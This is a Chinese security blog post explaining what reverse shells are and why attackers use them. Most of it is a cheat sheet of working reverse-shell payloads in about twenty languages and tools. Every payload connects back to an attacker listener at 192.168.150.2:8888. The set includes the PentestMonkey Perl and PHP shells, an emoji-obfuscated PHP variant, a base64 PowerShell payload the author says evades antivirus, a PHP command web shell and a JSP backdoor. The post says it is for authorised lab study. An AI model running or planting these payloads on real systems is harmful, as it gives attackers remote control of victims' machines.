学习干货|那些年的问题:什么是反弹shell?

admin
admin
admin
102369
文章
87
评论
2024年1月5日22:41:54评论24 views字数 17969阅读59分53秒阅读模式

学习干货|那些年的问题:什么是反弹shell?

0x01 前言

什么是反弹shell?

反弹Shell是一种网络攻击技术,也称为反向Shell或反向连接Shell。它的目的是让攻击者能够远程控制受攻击系统,并从中执行命令

在一般情况下,Shell是指操作系统提供的命令行接口。攻击者可以通过利用安全漏洞或其他手段,将恶意代码或Shell程序注入到受攻击系统中。当成功注入后,攻击者可以通过控制Shell来执行各种操作,如查看、修改或删除文件,执行命令等

攻击者为什么要反弹shell?

往往由于很多因素如:防火墙的开启限制    端口被占用    无法进行正向连接攻击者可能无法直接从受攻击系统上建立连接并获取Shell控制权。这时,攻击者就会使用反弹Shell技术。

反弹shell的原理

攻击者在受攻击系统上植入恶意代码或Shell程序,并将其配置成反向连接模式。攻击者预先在自己的控制服务器上监听一个端口,并等待受攻击系统主动连接。一旦受攻击系统与攻击者的服务器建立连接,攻击者就能够通过该连接获得Shell控制权,并可以执行各种操作

简单举例说明

1. 某台主机为Linux系统,正向连接获取连接操作的方式为22端口SSH(正常情况下)2. 在无密码且风险最小化,暴露面最小化的情况下,攻击者利用某端口服务RCE3. 利用漏洞攻击者植入恶意代码程序,拿到了shell操作控制权

攻击者反弹shell的一些原因

1. 远程控制:通过反弹shell,攻击者可以远程控制目标系统,执行各种命令和操作,获得对目标系统的完全控制权限。2. 隐藏攻击痕迹:通过反弹shell,攻击者可以在目标系统上执行命令,而不需要直接与目标系统进行交互。这样可以减少被发现的风险,同时也可以更好地隐藏攻击者的身份和攻击行为。3. 横向渗透:一旦攻击者成功反弹shell并获得目标系统的访问权限,他们可以进一步横向渗透,即在网络中移动并攻击其他系统,以获取更多的敏感信息或控制权。4. 数据盗取和系统破坏:通过反弹shell,攻击者可以获取目标系统上的敏感数据,并且可以操纵系统以造成损害,例如删除文件、破坏系统配置等。

* 如您觉得我的分享有用,麻烦点个关注收藏和赞、方便后期查找

0x02 代码复现

不论是在日常的一些靶机训练还是渗透等行为中,在后期很多时候都会有反弹shell操作(排除已知一些正向连接密码,或者上传成功了的马),以下记录一些反弹shell使用的代码及截图

* 代码中无复现截图的由于复现环境、可操作性、系统等原因无法复现,可自行复现

* 以下环境均为模拟,仅供学习参考、请勿在未授权的情况下非法使用,后果自行承担

攻击机操作系统: kali被攻击机操作系统: Debian linux攻击机IP: 192.168.150.2被攻击机IP: 192.168.150.42程序语言: PHP模拟环境: eval() 代码执行

使用方法一般根据自己行为习惯和使用反弹shell的命令工具自行决定、如命令执行或以语言作为文件去执行等

Bash/sh

sh -i >& /dev/tcp/192.168.150.2/8888 0>&1

学习干货|那些年的问题:什么是反弹shell?

Bash/sh 196 TCP

0<&196;exec 196<>/dev/tcp/192.168.150.2/8888; sh <&196 >&196 2>&196

学习干货|那些年的问题:什么是反弹shell?

Bash/sh 196 UDP

0<&196;exec 196<>/dev/udp/192.168.150.2/8888; sh <&196 >&196 2>&196

Bash read line

exec 5<>/dev/tcp/192.168.150.2/8888;cat <&5 | while read line; do $line 2>&5 >&5; done

学习干货|那些年的问题:什么是反弹shell?

nc mkfifo

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.150.2 8888 >/tmp/f

学习干货|那些年的问题:什么是反弹shell?

nc mknod

rm -f /tmp/p;mknod /tmp/p p && nc 192.168.150.2 8888 0/tmp/

nc -e

nc 192.168.150.2 8888 -e sh

学习干货|那些年的问题:什么是反弹shell?

2Xnc

sh | nc 192.168.150.2 8888 nc 192.168.150.2 8888 | sh

nc -c

nc -c sh 192.168.150.2 8888

学习干货|那些年的问题:什么是反弹shell?

ncat -e

ncat 192.168.150.2 8888 -e sh

学习干货|那些年的问题:什么是反弹shell?

ncat udp

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u 192.168.150.2 8888 >/tmp/f

rcat

rcat 192.168.150.2 8888 -r sh

C

#include <stdio.h>#include <sys/socket.h>#include <sys/types.h>#include <stdlib.h>#include <unistd.h>#include <netinet/in.h>#include <arpa/inet.h>
int main(void){    int port = 8888;    struct sockaddr_in revsockaddr;
    int sockt = socket(AF_INET, SOCK_STREAM, 0);    revsockaddr.sin_family = AF_INET;           revsockaddr.sin_port = htons(port);    revsockaddr.sin_addr.s_addr = inet_addr("192.168.150.2");
    connect(sockt, (struct sockaddr *) &revsockaddr,     sizeof(revsockaddr));    dup2(sockt, 0);    dup2(sockt, 1);    dup2(sockt, 2);
    char * const argv[] = {"sh", NULL};    execve("sh", argv, NULL);
    return 0;       }

学习干货|那些年的问题:什么是反弹shell?

C连接后立马中断可能是程序或系统、权限维持等原因

C-Windows

#include <winsock2.h>#include <stdio.h>#pragma comment(lib,"ws2_32")
WSADATA wsaData;SOCKET Winsock;struct sockaddr_in hax; char ip_addr[16] = "192.168.150.2"; char port[6] = "8888";            
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;
int main(){    WSAStartup(MAKEWORD(2, 2), &wsaData);    Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);

    struct hostent *host;     host = gethostbyname(ip_addr);    strcpy_s(ip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));
    hax.sin_family = AF_INET;    hax.sin_port = htons(atoi(port));    hax.sin_addr.s_addr = inet_addr(ip_addr);
    WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);
    memset(&ini_processo, 0, sizeof(ini_processo));    ini_processo.cb = sizeof(ini_processo);    ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;     ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;
    TCHAR cmd[255] = TEXT("cmd.exe");
    CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);
    return 0;}

Perl

perl -e 'use Socket;$i="192.168.150.2";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'

学习干货|那些年的问题:什么是反弹shell?

Perl no sh

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.150.2:8888");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

学习干货|那些年的问题:什么是反弹shell?

Perl PentestMonkey

#!/usr/bin/perl -w# perl-reverse-shell - A Reverse Shell implementation in PERL# Copyright (C) 2006 [email protected]## This tool may be used for legal purposes only.  Users take full responsibility# for any actions performed using this tool.  The author accepts no liability# for damage caused by this tool.  If these terms are not acceptable to you, then# do not use this tool.## In all other respects the GPL version 2 applies:## This program is free software; you can redistribute it and/or modify# it under the terms of the GNU General Public License version 2 as# published by the Free Software Foundation.## This program is distributed in the hope that it will be useful,# but WITHOUT ANY WARRANTY; without even the implied warranty of# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the# GNU General Public License for more details.## You should have received a copy of the GNU General Public License along# with this program; if not, write to the Free Software Foundation, Inc.,# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.## This tool may be used for legal purposes only.  Users take full responsibility# for any actions performed using this tool.  If these terms are not acceptable to# you, then do not use this tool.## You are encouraged to send comments, improvements or suggestions to# me at [email protected]## Description# -----------# This script will make an outbound TCP connection to a hardcoded IP and port.# The recipient will be given a shell running as the current user (apache normally).#
use strict;use Socket;use FileHandle;use POSIX;my $VERSION = "1.0";
# Where to send the reverse shell.  Change these.my $ip = '192.168.150.2';my $port = 8888;
# Optionsmy $daemon = 1;my $auth   = 0; # 0 means authentication is disabled and any     # source IP can access the reverse shellmy $authorised_client_pattern = qr(^127.0.0.1$);
# Declarationsmy $global_page = "";my $fake_process_name = "/usr/sbin/apache";
# Change the process name to be less conspicious$0 = "[httpd]";
# Authenticate based on source IP address if requiredif (defined($ENV{'REMOTE_ADDR'})) {  cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");
  if ($auth) {    unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {      cgiprint("ERROR: Your client isn't authorised to view this page");      cgiexit();    }  }} elsif ($auth) {  cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address.  Denying access");  cgiexit(0);}
# Background and dissociate from parent process if requiredif ($daemon) {  my $pid = fork();  if ($pid) {    cgiexit(0); # parent exits  }
  setsid();  chdir('/');  umask(0);}
# Make TCP connection for reverse shellsocket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {  cgiprint("Sent reverse shell to $ip:$port");  cgiprintpage();} else {  cgiprint("Couldn't open reverse shell to $ip:$port: $!");  cgiexit();  }
# Redirect STDIN, STDOUT and STDERR to the TCP connectionopen(STDIN, ">&SOCK");open(STDOUT,">&SOCK");open(STDERR,">&SOCK");$ENV{'HISTFILE'} = '/dev/null';system("w;uname -a;id;pwd");exec({"sh"} ($fake_process_name, "-i"));
# Wrapper around printsub cgiprint {  my $line = shift;  $line .= "<p>n";  $global_page .= $line;}
# Wrapper around exitsub cgiexit {  cgiprintpage();  exit 0; # 0 to ensure we don't give a 500 response.}
# Form HTTP response using all the messages gathered by cgiprint so farsub cgiprintpage {  print "Content-Length: " . length($global_page) . "rConnection: closerContent-Type: text/htmlrnrn" . $global_page;}

学习干货|那些年的问题:什么是反弹shell?

PHP Emoji

php -r '$😀="1";$😁="2";$😅="3";$😆="4";$😉="5";$😊="6";$😎="7";$😍="8";$😚="9";$🙂="0";$🤢=" ";$🤓="<";$🤠=">";$😱="-";$😵="&";$🤩="i";$🤔=".";$🤨="/";$🥰="a";$😐="b";$😶="i";$🙄="h";$😂="c";$🤣="d";$😃="e";$😄="f";$😋="k";$😘="n";$😗="o";$😙="p";$🤗="s";$😑="x";$💀 = $😄. $🤗. $😗. $😂. $😋. $😗. $😙. $😃. $😘;$🚀 = "192.168.150.2";$💻 = 8888;$🐚 = "sh". $🤢. $😱. $🤩. $🤢. $🤓. $😵. $😅. $🤢. $🤠. $😵. $😅. $🤢. $😁. $🤠. $😵. $😅;$🤣 =  $💀($🚀,$💻);$👽 = $😃. $😑. $😃. $😂;$👽($🐚);'

学习干货|那些年的问题:什么是反弹shell?

PHP PentestMonkey

<?php// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php// Copyright (C) 2007 [email protected]
set_time_limit (0);$VERSION = "1.0";$ip = '192.168.150.2';$port = 8888;$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'uname -a; w; id; sh -i';$daemon = 0;$debug = 0;
if (function_exists('pcntl_fork')) {  $pid = pcntl_fork();    if ($pid == -1) {    printit("ERROR: Can't fork");    exit(1);  }    if ($pid) {    exit(0);  // Parent exits  }  if (posix_setsid() == -1) {    printit("Error: Can't setsid()");    exit(1);  }
  $daemon = 1;} else {  printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");}
chdir("/");
umask(0);
// Open reverse connection$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {  printit("$errstr ($errno)");  exit(1);}
$descriptorspec = array(   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to   2 => array("pipe", "w")   // stderr is a pipe that the child will write to);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {  printit("ERROR: Can't spawn shell");  exit(1);}
stream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {  if (feof($sock)) {    printit("ERROR: Shell connection terminated");    break;  }
  if (feof($pipes[1])) {    printit("ERROR: Shell process terminated");    break;  }
  $read_a = array($sock, $pipes[1], $pipes[2]);  $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  if (in_array($sock, $read_a)) {    if ($debug) printit("SOCK READ");    $input = fread($sock, $chunk_size);    if ($debug) printit("SOCK: $input");    fwrite($pipes[0], $input);  }
  if (in_array($pipes[1], $read_a)) {    if ($debug) printit("STDOUT READ");    $input = fread($pipes[1], $chunk_size);    if ($debug) printit("STDOUT: $input");    fwrite($sock, $input);  }
  if (in_array($pipes[2], $read_a)) {    if ($debug) printit("STDERR READ");    $input = fread($pipes[2], $chunk_size);    if ($debug) printit("STDERR: $input");    fwrite($sock, $input);  }}
fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);
function printit ($string) {  if (!$daemon) {    print "$stringn";  }}
?>

学习干货|那些年的问题:什么是反弹shell?

PHP cmd

<html><body><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><input type="TEXT" name="cmd" id="cmd" size="80"><input type="SUBMIT" value="Execute"></form><pre><?php    if(isset($_GET['cmd']))    {        system($_GET['cmd']);    }?></pre></body><script>document.getElementById("cmd").focus();</script></html>

PHP exec

php -r '$sock=fsockopen("192.168.150.2",8888);exec("sh <&3 >&3 2>&3");'

学习干货|那些年的问题:什么是反弹shell?

PHP shell_exec

php -r '$sock=fsockopen("192.168.150.2",8888);shell_exec("sh <&3 >&3 2>&3");'

用法参考PHP exec

PHP system

php -r '$sock=fsockopen("192.168.150.2",8888);system("sh <&3 >&3 2>&3");'

用法参考PHP exec

PHP passthru

php -r '$sock=fsockopen("192.168.150.2",8888);passthru("sh <&3 >&3 2>&3");'

用法参考PHP exec

PHP popen

php -r '$sock=fsockopen("192.168.150.2",8888);popen("sh <&3 >&3 2>&3", "r");'

用法参考PHP exec

Python-1

export RHOST="192.168.150.2";export RPORT=8888;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

学习干货|那些年的问题:什么是反弹shell?

Python-2

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.150.2",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

学习干货|那些年的问题:什么是反弹shell?

Python3-1

export RHOST="192.168.150.2";export RPORT=8888;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

一般python有两个版本,系统可能同时安装了两个或者一个,在使用python报错时,可能没有配置python默认命令为python3,使用方法参考python-1

Python3-2

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.150.2",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

一般python有两个版本,系统可能同时安装了两个或者一个,在使用python报错时,可能没有配置python默认命令为python3,使用方法参考python-2

Ruby

ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("192.168.150.2",8888))'

学习干货|那些年的问题:什么是反弹shell?

Powershell-1

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.150.2",8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Windows机器使用、一般有杀软会被拦截

学习干货|那些年的问题:什么是反弹shell?

Powershell-2

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.150.2',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Powershell-base64

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADEANQAwAC4AMgAiACwAOAA4ADgAOAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

自行解码修改IP、杀软暂时无检测、自测

学习干货|那些年的问题:什么是反弹shell?

Socat-1

socat TCP:192.168.150.2:8888 EXEC:sh

学习干货|那些年的问题:什么是反弹shell?

Socat-2

socat TCP:192.168.150.2:8888 EXEC:'sh',pty,stderr,setsid,sigint,sane

学习干货|那些年的问题:什么是反弹shell?

node.js-1

require('child_process').exec('nc -e sh 192.168.150.2 8888')

学习干货|那些年的问题:什么是反弹shell?

连接秒断可能和程序,系统或者权限维持有关

node.js-2

(function(){    var net = require("net"),        cp = require("child_process"),        sh = cp.spawn("sh", []);    var client = new net.Socket();    client.connect(8888, "192.168.150.2", function(){        client.pipe(sh.stdin);        sh.stdout.pipe(client);        sh.stderr.pipe(client);    });    return /a/; // Prevents the Node.js application from crashing})();

学习干货|那些年的问题:什么是反弹shell?

JAVA-1

public class shell {    public static void main(String[] args) {        Process p;        try {            p = Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.150.2/8888 0>&1");            p.waitFor();            p.destroy();        } catch (Exception e) {}    }}

JAVA-2

public class shell {    public static void main(String[] args) {        ProcessBuilder pb = new ProcessBuilder("bash", "-c", "$@| bash -i >& /dev/tcp/192.168.150.2/8888 0>&1")            .redirectErrorStream(true);        try {            Process p = pb.start();            p.waitFor();            p.destroy();        } catch (Exception e) {}    }}

JAVA-3

import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;
public class shell {    public static void main(String[] args) {        String host = "192.168.150.2";        int port = 8888;        String cmd = "sh";        try {            Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();            Socket s = new Socket(host, port);            InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();            OutputStream po = p.getOutputStream(), so = s.getOutputStream();            while (!s.isClosed()) {                while (pi.available() > 0)                    so.write(pi.read());                while (pe.available() > 0)                    so.write(pe.read());                while (si.available() > 0)                    po.write(si.read());                so.flush();                po.flush();                Thread.sleep(50);                try {                    p.exitValue();                    break;                } catch (Exception e) {}            }            p.destroy();            s.close();        } catch (Exception e) {}    }}

JAVA WEB

<%@page import="java.lang.*, java.util.*, java.io.*, java.net.*"% ><%!static class StreamConnector extends Thread{        InputStream is;        OutputStream os;        StreamConnector(InputStream is, OutputStream os)        {                this.is = is;                this.os = os;        }        public void run()        {                BufferedReader isr = null;                BufferedWriter osw = null;                try                {                        isr = new BufferedReader(new InputStreamReader(is));                        osw = new BufferedWriter(new OutputStreamWriter(os));                        char buffer[] = new char[8192];                        int lenRead;                        while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)                        {                                osw.write(buffer, 0, lenRead);                                osw.flush();                        }                }                catch (Exception ioe)                try                {                        if(isr != null) isr.close();                        if(osw != null) osw.close();                }                catch (Exception ioe)        }}%>
<h1>JSP Backdoor Reverse Shell</h1>
<form method="post">IP Address<input type="text" name="ipaddress" size=30>Port<input type="text" name="port" size=10><input type="submit" name="Connect" value="Connect"></form><p><hr>
<%String ipAddress = request.getParameter("ipaddress");String ipPort = request.getParameter("port");if(ipAddress != null && ipPort != null){        Socket sock = null;        try        {                sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());                Runtime rt = Runtime.getRuntime();                Process proc = rt.exec("cmd.exe");                StreamConnector outputConnector =                        new StreamConnector(proc.getInputStream(),                                          sock.getOutputStream());                StreamConnector inputConnector =                        new StreamConnector(sock.getInputStream(),                                          proc.getOutputStream());                outputConnector.start();                inputConnector.start();        }        catch(Exception e) }%>

Openssl

mkfifo /tmp/s;sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.150.2:8888 > /tmp/s; rm /tmp/s

学习干货|那些年的问题:什么是反弹shell?

Telnet

TF=$(mktemp -u);mkfifo $TF && telnet 192.168.150.2 8888 0<$TF | sh 1>$TF

学习干货|那些年的问题:什么是反弹shell?

Telnet mknod

mknod backpipe p && telnet 192.168.150.2 8888 0<backpipe | sh 1>backpipe

用法参考Telnet

GO-1

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.150.2:8888");cmd:=exec.Command("sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

学习干货|那些年的问题:什么是反弹shell?

GO-2

echo 'package main;import"os/exec";import"log";func main() {cmdline := "exec 5<>/dev/tcp/192.168.150.2/8888;cat <&5 | while read line; do $line 2>&5 >&5; done";cmd := exec.Command("/bin/bash", "-c", cmdline);bytes, err := cmd.Output();if err != nil {log.Println(err);}resp := string(bytes);log.Println(resp);}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

用法参考GO-1

GO-3

echo 'package main;import"os/exec";import"log";func main(){cmdline := "bash -i >& /dev/tcp/192.168.0.1/65535 0>&1";cmd := exec.Command("/bin/bash", "-c", cmdline);}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

用法参考GO-1

AWK

awk 'BEGIN {s = "/inet/tcp/0/192.168.150.2/8888"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

0x03 总结

文字相对有些多,码字复现不易、但是以后总会用到,作为红队应该以拿下Shell为目的,最为蓝队应该以防范红队为目的,麻烦点赞关注收藏,方便下次不迷路!学习干货|那些年的问题:什么是反弹shell?

原文始发于微信公众号(州弟学安全):学习干货|那些年的问题:什么是反弹shell?

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月5日22:41:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   学习干货|那些年的问题:什么是反弹shell?https://cn-sec.com/archives/2369242.html

发表评论

匿名网友 填写信息